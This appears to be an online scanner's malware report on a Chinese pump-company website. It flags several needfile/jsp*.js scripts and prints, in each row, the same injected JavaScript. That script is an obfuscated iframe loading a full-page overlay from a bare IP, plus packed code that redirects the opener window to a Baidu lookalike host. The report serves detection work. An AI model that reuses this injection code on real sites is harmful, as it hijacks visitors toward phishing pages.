Scanned pages/files
Request | Server response | Status |
http://artis-www.yuantupump.com/ | 200 OK Content-Length: 13720 Content-Type: text/html | clean |
http://artis-www.yuantupump.com/needfile/jsp1878.js?vi=9334 | 200 OK Content-Length: 2005 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. The iframe URL is split into short string fragments and percent-encoded inside unescape(), and a packed eval() payload follows it; the decoded output shows a full-page overlay (#dedeadban: absolute position, 100% width, z-index 9999) that frames an external host, plus script that sets parent.window.opener.location to a host under rsv.pm whose name begins with www.baidu.com. The other flagged needfile/jsp*.js rows show the same visible snippet. document.write('<div id="dedeadban">'+unescape('%3Cifr'+'am'+'e%20src%3D%27htt'+'p://1'+'12.12'+'4.49.5'+'8/l.ht'+'ml%27%20width%3D%27100%25%27%20height%3D%27100%25%27%20%20frameborder%3D%270%27%20allowtransparency%3D%27true%27%20marginwidth%3D%270%27%20marginheight%3D%270%27%20%20border%3D%270%27%3E%3C/ifr'+'ame%3E')+eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStrin ...[1634 bytes skipped]... Decoded script: ...[2196 bytes skipped]... n])}}};b=b.substring(b.indexOf("?"));var h=null;var i=null;i=document.cookie.length;parent.window.opener.location="http://www.baidu.com.rsv.pm/s"+b+'&fir=1'}}};var c=function(){if(!jQuery().fancybox){return};if(jQuery(".fancybox-button").size()>0){jQuery(".fancybox-button").fancybox({groupAttr:'data-rel',prevEffect:'none',nextEffect:'none',closeBtn:true,helpers:{title:{type:'inside'}}});jumpToBaidu()}} <div id="dedeadban"><iframe src='http://112.124.49.58/l.html' width='100%' height='100%' frameborder='0' allowtransparency='true' marginwidth='0' marginheight='0' border='0'></iframe><liclass="out"><style>#dedeadban {position:absolute;height:2520px;top:0px;left:0px;width:100%;z-index:9999;}</style></div> | ||
http://artis-www.yuantupump.com/sport112/ | 200 OK Content-Length: 10507 Content-Type: text/html | clean |
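http://artis-www.yuantupump.com/needfile/jsp7215.js?vi=1524 | 500 timeout Content-Length: 30 Content-Type: text/plain | clean (the verdict covers only the 30-byte timeout response; the script body appears not to have been retrieved, so this URL should be re-scanned rather than treated as verified clean) |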
http://artis-www.yuantupump.com/test404page.js | 404 Not Found Content-Length: 564 Content-Type: text/html | clean |
http://artis-www.yuantupump.com/sport91/ | 200 OK Content-Length: 10073 Content-Type: text/html | clean |
http://artis-www.yuantupump.com/needfile/jsp9382.js?vi=4212 | 200 OK Content-Length: 2005 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. document.write('<div id="dedeadban">'+unescape('%3Cifr'+'am'+'e%20src%3D%27htt'+'p://1'+'12.12'+'4.49.5'+'8/l.ht'+'ml%27%20width%3D%27100%25%27%20height%3D%27100%25%27%20%20frameborder%3D%270%27%20allowtransparency%3D%27true%27%20marginwidth%3D%270%27%20marginheight%3D%270%27%20%20border%3D%270%27%3E%3C/ifr'+'ame%3E')+eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStrin ...[1634 bytes skipped]... Decoded script: ...[2196 bytes skipped]... n])}}};b=b.substring(b.indexOf("?"));var h=null;var i=null;i=document.cookie.length;parent.window.opener.location="http://www.baidu.com.rsv.pm/s"+b+'&fir=1'}}};var c=function(){if(!jQuery().fancybox){return};if(jQuery(".fancybox-button").size()>0){jQuery(".fancybox-button").fancybox({groupAttr:'data-rel',prevEffect:'none',nextEffect:'none',closeBtn:true,helpers:{title:{type:'inside'}}});jumpToBaidu()}} <div id="dedeadban"><iframe src='http://112.124.49.58/l.html' width='100%' height='100%' frameborder='0' allowtransparency='true' marginwidth='0' marginheight='0' border='0'></iframe><liclass="out"><style>#dedeadban {position:absolute;height:2520px;top:0px;left:0px;width:100%;z-index:9999;}</style></div> | ||
http://artis-www.yuantupump.com/sport22/ | 200 OK Content-Length: 11340 Content-Type: text/html | clean |
http://artis-www.yuantupump.com/needfile/jsp6053.js?vi=9553 | 200 OK Content-Length: 2005 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. document.write('<div id="dedeadban">'+unescape('%3Cifr'+'am'+'e%20src%3D%27htt'+'p://1'+'12.12'+'4.49.5'+'8/l.ht'+'ml%27%20width%3D%27100%25%27%20height%3D%27100%25%27%20%20frameborder%3D%270%27%20allowtransparency%3D%27true%27%20marginwidth%3D%270%27%20marginheight%3D%270%27%20%20border%3D%270%27%3E%3C/ifr'+'ame%3E')+eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStrin ...[1634 bytes skipped]... Decoded script: ...[2196 bytes skipped]... n])}}};b=b.substring(b.indexOf("?"));var h=null;var i=null;i=document.cookie.length;parent.window.opener.location="http://www.baidu.com.rsv.pm/s"+b+'&fir=1'}}};var c=function(){if(!jQuery().fancybox){return};if(jQuery(".fancybox-button").size()>0){jQuery(".fancybox-button").fancybox({groupAttr:'data-rel',prevEffect:'none',nextEffect:'none',closeBtn:true,helpers:{title:{type:'inside'}}});jumpToBaidu()}} <div id="dedeadban"><iframe src='http://112.124.49.58/l.html' width='100%' height='100%' frameborder='0' allowtransparency='true' marginwidth='0' marginheight='0' border='0'></iframe><liclass="out"><style>#dedeadban {position:absolute;height:2520px;top:0px;left:0px;width:100%;z-index:9999;}</style></div> | ||
http://artis-www.yuantupump.com/sport01/ | 200 OK Content-Length: 10370 Content-Type: text/html | clean |
http://artis-www.yuantupump.com/needfile/jsp7861.js?vi=7168 | 200 OK Content-Length: 2005 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. document.write('<div id="dedeadban">'+unescape('%3Cifr'+'am'+'e%20src%3D%27htt'+'p://1'+'12.12'+'4.49.5'+'8/l.ht'+'ml%27%20width%3D%27100%25%27%20height%3D%27100%25%27%20%20frameborder%3D%270%27%20allowtransparency%3D%27true%27%20marginwidth%3D%270%27%20marginheight%3D%270%27%20%20border%3D%270%27%3E%3C/ifr'+'ame%3E')+eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStrin ...[1634 bytes skipped]... Decoded script: ...[2196 bytes skipped]... n])}}};b=b.substring(b.indexOf("?"));var h=null;var i=null;i=document.cookie.length;parent.window.opener.location="http://www.baidu.com.rsv.pm/s"+b+'&fir=1'}}};var c=function(){if(!jQuery().fancybox){return};if(jQuery(".fancybox-button").size()>0){jQuery(".fancybox-button").fancybox({groupAttr:'data-rel',prevEffect:'none',nextEffect:'none',closeBtn:true,helpers:{title:{type:'inside'}}});jumpToBaidu()}} <div id="dedeadban"><iframe src='http://112.124.49.58/l.html' width='100%' height='100%' frameborder='0' allowtransparency='true' marginwidth='0' marginheight='0' border='0'></iframe><liclass="out"><style>#dedeadban {position:absolute;height:2520px;top:0px;left:0px;width:100%;z-index:9999;}</style></div> | ||
http://artis-www.yuantupump.com/sport41/ | 200 OK Content-Length: 10424 Content-Type: text/html | clean |
http://artis-www.yuantupump.com/needfile/jsp3836.js?vi=3176 | 200 OK Content-Length: 2005 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. document.write('<div id="dedeadban">'+unescape('%3Cifr'+'am'+'e%20src%3D%27htt'+'p://1'+'12.12'+'4.49.5'+'8/l.ht'+'ml%27%20width%3D%27100%25%27%20height%3D%27100%25%27%20%20frameborder%3D%270%27%20allowtransparency%3D%27true%27%20marginwidth%3D%270%27%20marginheight%3D%270%27%20%20border%3D%270%27%3E%3C/ifr'+'ame%3E')+eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStrin ...[1634 bytes skipped]... Decoded script: ...[2196 bytes skipped]... n])}}};b=b.substring(b.indexOf("?"));var h=null;var i=null;i=document.cookie.length;parent.window.opener.location="http://www.baidu.com.rsv.pm/s"+b+'&fir=1'}}};var c=function(){if(!jQuery().fancybox){return};if(jQuery(".fancybox-button").size()>0){jQuery(".fancybox-button").fancybox({groupAttr:'data-rel',prevEffect:'none',nextEffect:'none',closeBtn:true,helpers:{title:{type:'inside'}}});jumpToBaidu()}} <div id="dedeadban"><iframe src='http://112.124.49.58/l.html' width='100%' height='100%' frameborder='0' allowtransparency='true' marginwidth='0' marginheight='0' border='0'></iframe><liclass="out"><style>#dedeadban {position:absolute;height:2520px;top:0px;left:0px;width:100%;z-index:9999;}</style></div> | ||
http://artis-www.yuantupump.com/sport52/ | 200 OK Content-Length: 10952 Content-Type: text/html | clean |
http://artis-www.yuantupump.com/needfile/jsp4432.js?vi=2450 | 200 OK Content-Length: 2005 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. document.write('<div id="dedeadban">'+unescape('%3Cifr'+'am'+'e%20src%3D%27htt'+'p://1'+'12.12'+'4.49.5'+'8/l.ht'+'ml%27%20width%3D%27100%25%27%20height%3D%27100%25%27%20%20frameborder%3D%270%27%20allowtransparency%3D%27true%27%20marginwidth%3D%270%27%20marginheight%3D%270%27%20%20border%3D%270%27%3E%3C/ifr'+'ame%3E')+eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStrin ...[1634 bytes skipped]... Decoded script: ...[2196 bytes skipped]... n])}}};b=b.substring(b.indexOf("?"));var h=null;var i=null;i=document.cookie.length;parent.window.opener.location="http://www.baidu.com.rsv.pm/s"+b+'&fir=1'}}};var c=function(){if(!jQuery().fancybox){return};if(jQuery(".fancybox-button").size()>0){jQuery(".fancybox-button").fancybox({groupAttr:'data-rel',prevEffect:'none',nextEffect:'none',closeBtn:true,helpers:{title:{type:'inside'}}});jumpToBaidu()}} <div id="dedeadban"><iframe src='http://112.124.49.58/l.html' width='100%' height='100%' frameborder='0' allowtransparency='true' marginwidth='0' marginheight='0' border='0'></iframe><liclass="out"><style>#dedeadban {position:absolute;height:2520px;top:0px;left:0px;width:100%;z-index:9999;}</style></div> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: artis-www.yuantupump.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Apr 2014 19:25:19 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
X-Powered-By: PHP/5.3.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: artis-www.yuantupump.com
Referer: http://www.google.com/search?q=artis-www.yuantupump.com
Result:
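The result is similar to the first query. No suspicious redirects were found in the server's HTTP response. This check appears to compare HTTP responses only; the decoded script in the flagged needfile/jsp*.js files changes parent.window.opener.location in the browser, which a response-level comparison does not cover.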
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=artis-www.yuantupump.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://artis-www.yuantupump.com/
Result: artis-www.yuantupump.com is not infected or malware details are not published yet.